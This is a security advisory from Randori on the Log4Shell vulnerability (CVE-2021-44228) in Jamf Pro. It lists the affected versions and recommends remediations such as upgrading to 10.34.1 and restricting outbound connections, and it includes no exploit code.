Update Regarding Exploitability of JAMF Pro:
Last Update: 3:22pm EST, Dec. 11, 2021
Following the acknowledgement of products affected by Log4j, Randori can confirm the exploitability of Jamf Pro (security notice) via the Log4j CVE-2021-44228 also known as “Log4Shell.” Recent unpatched versions of Jamf Pro, including those running on Java 11, are not and should not be considered protected against this exploitation. Due to the severity of impact from the exploit (RCE) and the widespread use of this Java library, Randori recommends this vulnerability be addressed immediately.
Randori’s Attack Team has validated exploitability with working exploits that achieve code execution via unauthenticated network vectors specifically on Jamf Pro and anticipates widespread exploitation by threat actors imminently. Randori does not release proof-of-concept code. These exploits include 10.34.0 on Java 11.
Based on our experience exploiting this vulnerability, we suggest organizations running Jamf Pro on-premises take the following steps to reduce their risks at this time:
- Review guidance provided by JAMF. Specifically, upgrade to 10.34.1 or later.
Randori’s Attack Team has confirmed that current exploitation techniques do not affect Jamf version 10.34.1.
Randori has observed cloud-hosted Jamf Pro instances reporting version numbers consistent with exploitability, but Jamf has reported that cloud-hosted instances are mitigated. Randori’s Attack Team has not independently verified the efficacy or extent of mitigations, and recommends treating any Jamf Pro instance prior to 10.34.1 as exploitable.
Situation Report: Jamf Impact from Log4Shell
A high severity vulnerability (CVE-2021-44228) impacting multiple versions of the Apache Log4j 2 library was disclosed publicly via the project’s GitHub on December 9, 2021. This vulnerability, impacts multiple Jamf products. The Randori Attack Team can confirm exploitability of Jamf products in live environments via Log4j (CVE-2021-44228) aka “Log4Shell”.
This is a critical vulnerability and impacted organizations should take immediate action. This post will be regularly updated, but follow @RandoriAttack for immediate updates.
The Log4j 2 library is very frequently used in enterprise Java software. Similarly to other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe there will be an increasing number of vulnerable products discovered in the weeks to come. Randori has validated exploitability with a working exploit, and anticipates widespread exploitation by threat actors imminently. Randori has been in contact with the Jamf team to assist their development of mitigations
- Jamf Pro (on-prem)
- Versions up to and including 10.34.0 are remotely exploitable, including those running on Java 11.
- Jamf Pro (cloud)
- Jamf asserts these instances have been mitigated. This claim has not been validated by Randori.
Remediations & Recommendations
If running a vulnerable version of Jamf Pro, Randori recommends organizations take immediate action and do the following:
- Implement default-deny for outbound network connections initiated by the Jamf server.
- Assume compromise and review logs for signs of malicious activity.
- Monitor our Log4Shell Attacker Note for impact of Log4Shell beyond Jamf
- Follow @RandoriAttack for updates.
If anomalies are found, we encourage you to assume this is an active incident, that you have been compromised and respond accordingly.